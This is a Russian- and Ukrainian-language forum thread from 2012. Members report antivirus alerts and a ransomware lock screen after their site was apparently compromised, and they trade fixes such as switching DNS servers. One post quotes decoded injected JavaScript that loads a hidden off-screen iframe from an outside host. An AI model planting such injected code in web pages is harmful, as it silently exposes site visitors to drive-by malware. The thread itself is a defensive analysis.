Сообщений в теме: 78

[Важняк]

А у меня уже нормуль.

[Топор]

И у меня нормуль уже. А то пару дней с рабочего касперский визжал и переспрашивал по заходу а из домашнего аваст вообще не пускал.

[Bay]

Серега, соображаю:) продолжаем дальше думать что все пушисто:)
Тем более за высказывание вольных мыслей о структуре сайта итд был словесно наказан, теперь нини:)

Саня! Реально, против тебя лично ничего не хотел сказать. Возможно попытка пошутить была неудачной.

[Bay]

А по теме, просто есть азы безопасности. Полезно почитать памятку о безопасном использовании интернет банкинга у любого банка:
- Для входа в систему не используйте подключение по баннерным ссылкам либо ссылкам, полученным по электронной почте.
- Не отвечайте на запросы (чаще всего рассылаются через электронную почту), содержащие требование предоставить или проверить логин и пароль.
- Рекомендуется удалять подозрительные электронные письма, не открывая их, особенно письма от неизвестных отправителей с прикрепленными файлами с расширениями *.exe, *.pif, *.vbs и другие файлы.
и т.д. и т.п.

[pseudo]

Всі ці ази ніяк не допомагають при атаках типу «DNS Spoofing», яка, на мою думку, мала місце в даному випадку. Трошки допомагають своєчасні оновлення програмного забезпечення Ваших машин (дозволяють позбутись проблем, коли підставний сайт зміює адресу в полі вводу та заголоку вікна на відповідні адреси реального сайту).
Коротше, софт має бути свіжим, антивірус—оновленим, файрвол просто має бути, бо наші провайдери часто виставляють комп’ютери клієнтів «голою ж в Інтернет».

[Alex_CONNECT]

обнаружено: троянская программа HEUR:Exploit.Script.Blocker файл: http://ecwosrvyqrzka...94/jAA2ingo.jar

[hakim4x4]

Вновь ругается:

[pasic]

Вновь ругается:

У меня тоже опера что то ругнулась. Раньше не замечал.

Прикрепленные файлы

•  virus.JPG   74.13К   39 Количество загрузок:

[Дембель]

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:

Можно как-то наказать шутников? Или проклятие наслать?
Или хотя бы код для разблокирования подскажите...

[Зундер]

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:

Вот это наглость!!!
http://yandex.ua/yan...окировка&lr=143

[yurchic]

У меня тоже опера что то ругнулась. Раньше не замечал.

и у меня сегодня ругается

[rut]

О, я сегодня случайно словил интересную фигню, когда постил сообщение. Для интереса немного поковырялся и получилось вот что: двойной eval в js - на такую конструкцию почти любой антивирь заругается в "параноидальном" режиме. А тело скрипта еще и зашифровано ко всем радостям... я у себя проверил - вроде ничего вредного, просто добавляет ссылки на какой то левый сайт, вот расшифрованный код, который эвалится:

var newIframe=document.createElement('iframe');newIframe.src='http://ynefgawcfrol.cnisemi.com/do.php?fn=1&id=108&pageLoad=';newIframe.style.width='10px';newIframe.style.height='10px';newIframe.style.position='absolute';newIframe.style.top='-100px';newIframe.style.left='-100px';document.body.insertBefore(newIframe, document.body.firstChild);

Надеюсь эта инфа поможет админам в устранении проблемы.

[Зундер]

добавляет ссылки на какой то левый сайт, вот расшифрованный код, который эвалится:

http://whois.domaintools.com/cnisemi.com китайские хакеры.

Я так понимаю, что наших читателей в Китае нет, так что заблокировать нахрен весь IP-диапазон на уровне хостера.

[Mihey]

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
Изображение
Можно как-то наказать шутников? Или проклятие наслать?
Или хотя бы код для разблокирования подскажите...

Эта же куйня и на меня напала
В безопасном режиме убрал из автозагрузки файл ms
И удалил ms.exe по адресу указанному в автозагрузке.

[pseudo]

обнаружено: троянская программа HEUR:Exploit.Script.Blocker файл: http://ecwosrvyqrzka...94/jAA2ingo.jar

О, так вже краще.
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.

Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.

[hakim4x4]

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:

О, в полку извращенцев прибыло!
http://www.offroadma...st__p__26279677

[Bay]

О, так вже краще.
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.

Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.

Кстати, скорее всего это решение проблемы.
У меня в настройках: предпочитаемый DNS-сервер 8.8.8.8. гугловский, а уже в альтернативных свой. Может поэтому никогда проблем не было?

[Важняк]

У меня опять предупреждение выдало, причем файлы не хавает. Вот что пишет - "Последняя проверка (менее двух дней назад) показала, что на сайте размещён вредоносный код. Вредоносный код: обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО; содержит Mal/ExpJS-AN, Troj/ExpJS-FU (по данным компании Sophos)".
Все таки кто то наш сервер таки заразил. Я гляжу, у нас много недоброжелателей появилось...

Сообщение отредактировал Важняк: 29 October 2012 - 21:52

[hakim4x4]

Сегодня, при клике на "Форумы", снова начало открываться что-то типа "Эбаут флеш плеер или фотошоп" и сразу после этого выплюнуло уже известную табличку по педофилии... Восстановил... Реально уже начинает утомлять...